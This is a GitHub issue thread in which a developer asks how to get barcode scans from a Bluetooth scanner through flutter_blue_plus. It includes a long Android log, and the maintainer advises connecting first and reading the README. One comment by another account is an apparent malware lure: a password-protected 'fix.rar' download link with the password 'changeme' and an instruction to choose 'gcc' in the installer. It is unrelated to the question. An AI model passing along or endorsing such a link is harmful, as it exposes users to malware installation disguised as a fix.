chipweinberger/flutter_blue_plus #980: [Help]: I have a Barcode Scanner, but services list is empty, how can I listen to scans?

burekas7, 2024-08-26:
### Requirements

- [X] I've looked at the README 'Common Problems' section

### Have you checked this problem on the example app?

No

### FlutterBluePlus Version

3.

### Flutter Version

3.19.5

### What OS?

Android

### OS Version

13

### Bluetooth Module

Bur3076

### What is your problem?

I found the device with `FlutterBluePlus.bondedDevices`
I want to listen to the scans values, but the services list is empty.
So how can I do that?

### Logs

```shell
Launching lib/main.dart on Pixel 4 in debug mode...
✓  Built build/app/outputs/flutter-apk/app-debug.apk.
Connecting to VM Service at ws://127.0.0.1:57408/FMQDmCkwisQ=/ws
I/flutter (24209): Box initial: pictures
I/flutter (24209): Box initial: Regions
I/flutter (24209): Box initial: ApiConfig
I/flutter (24209): Box initial: manifests
I/flutter (24209): Box initial: warehouse
I/flutter (24209): Box initial: monitor_upload
I/CameraManagerGlobal(24209): Connecting to camera service
I/flutter (24209): Connectivity status: [ConnectivityResult.wifi]
D/MediaCodecList(24209): codecHandlesFormat: no format, so no extra checks
D/CCodec  (24209): allocate(c2.android.raw.decoder)
I/Codec2Client(24209): Available Codec2 services: "default" "software"
I/CCodec  (24209): setting up 'default' as default (vendor) store
I/CCodec  (24209): Created component [c2.android.raw.decoder]
D/CCodecConfig(24209): read media type: audio/raw
D/ReflectedParamUpdater(24209): extent() != 1 for single value type: algo.buffers.max-count.values
D/ReflectedParamUpdater(24209): extent() != 1 for single value type: output.subscribed-indices.values
D/ReflectedParamUpdater(24209): extent() != 1 for single value type: input.buffers.allocator-ids.values
D/ReflectedParamUpdater(24209): extent() != 1 for single value type: output.buffers.allocator-ids.values
D/ReflectedParamUpdater(24209): extent() != 1 for single value type: algo.buffers.allocator-ids.values
D/ReflectedParamUpdater(24209): extent() != 1 for single value type: output.buffers.pool-ids.values
D/ReflectedParamUpdater(24209): extent() != 1 for single value type: algo.buffers.pool-ids.values
I/CCodecConfig(24209): query failed after returning 8 values (BAD_INDEX)
D/CCodecConfig(24209): c2 config diff is Dict {
D/CCodecConfig(24209):   c2::u32 coded.bitrate.value = 64000
D/CCodecConfig(24209):   c2::u32 input.buffers.max-size.value = 65536
D/CCodecConfig(24209):   c2::u32 input.delay.value = 0
D/CCodecConfig(24209):   string input.media-type.value = "audio/raw"
D/CCodecConfig(24209):   string output.media-type.value = "audio/raw"
D/CCodecConfig(24209):   c2::u32 raw.channel-count.value = 2
D/CCodecConfig(24209):   c2::u32 raw.pcm-encoding.value = 0
[... 472 lines cut ...]
D/[FBP-Android](24209): [FBP] onMethodCall: getAdapterState
I/flutter (24209): [FBP] <getAdapterState> result: {adapter_state: 4}
I/flutter (24209): BluetoothAdapterState.on
I/flutter (24209): [FBP] <getSystemDevices> args: null
D/[FBP-Android](24209): [FBP] onMethodCall: getSystemDevices
I/flutter (24209): [FBP] <getSystemDevices> result: {devices: []}
I/flutter (24209): [FBP] <getBondedDevices> args: null
D/[FBP-Android](24209): [FBP] onMethodCall: getBondedDevices
I/flutter (24209): [FBP] <getBondedDevices> result: {devices: [{remote_id: AA:A8:A3:1C:E1:14, platform_name: ScannerHID}]}
I/tflite  (24209): Initialized TensorFlow Lite runtime.
W/libc    (24209): Access denied finding property "ro.mediatek.platform"
W/libc    (24209): Access denied finding property "ro.chipname"
W/libc    (24209): Access denied finding property "ro.hardware.chipname"
I/tflite  (24209): Created TensorFlow Lite XNNPACK delegate for CPU.
I/tflite  (24209): Replacing 43 out of 43 node(s) with delegate (TfLiteXNNPackDelegate) node, yielding 1 partitions for the whole graph.
I/tflite  (24209): Replacing 42 out of 47 node(s) with delegate (TfLiteXNNPackDelegate) node, yielding 11 partitions for the whole graph.
I/native  (24209): I0000 00:00:1724706493.578206   24373 oned_decoder_client.cc:695] barhopper::deep_learning::OnedDecoderClient is created successfully.
D/TransportRuntime.SQLiteEventStore(24209): Storing event with priority=VERY_LOW, name=FIREBASE_ML_SDK for destination cct
D/TransportRuntime.JobInfoScheduler(24209): Upload for context TransportContext(cct, VERY_LOW, MSRodHRwczovL2ZpcmViYXNlbG9nZ2luZy5nb29nbGVhcGlzLmNvbS92MGNjL2xvZy9iYXRjaD9mb3JtYXQ9anNvbl9wcm90bzNc) is already scheduled. Returning...
D/TransportRuntime.SQLiteEventStore(24209): Storing event with priority=VERY_LOW, name=FIREBASE_ML_SDK for destination cct
W/System  (24209): A resource failed to call Surface.release.
D/TransportRuntime.JobInfoScheduler(24209): Upload for context TransportContext(cct, VERY_LOW, MSRodHRwczovL2ZpcmViYXNlbG9nZ2luZy5nb29nbGVhcGlzLmNvbS92MGNjL2xvZy9iYXRjaD9mb3JtYXQ9anNvbl9wcm90bzNc) is already scheduled. Returning...
D/TransportRuntime.SQLiteEventStore(24209): Storing event with priority=VERY_LOW, name=FIREBASE_ML_SDK for destination cct
D/TransportRuntime.JobInfoScheduler(24209): Upload for context TransportContext(cct, VERY_LOW, MSRodHRwczovL2ZpcmViYXNlbG9nZ2luZy5nb29nbGVhcGlzLmNvbS92MGNjL2xvZy9iYXRjaD9mb3JtYXQ9anNvbl9wcm90bzNc) is already scheduled. Returning...
```

burekas7, 2024-08-26:
Maybe this can help somehow?
https://issuetracker.google.com/issues/269646835?pli=1

Avishake2017, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

chipweinberger, 2024-08-27:
you need to connect first. look at the README

closed 2024-08-27 by chipweinberger

chipweinberger, 2024-08-27:
look a readme!

burekas7, 2024-08-27:
@chipweinberger 

This one?
```
ANDROID_SPECIFIC_ERROR [#](https://pub.dev/packages/flutter_blue_plus#android_specific_error)
There is no 100% solution.

FBP already has mitigations for this error, but Android will still fail with this code randomly.

The recommended solution is to catch the error, and
```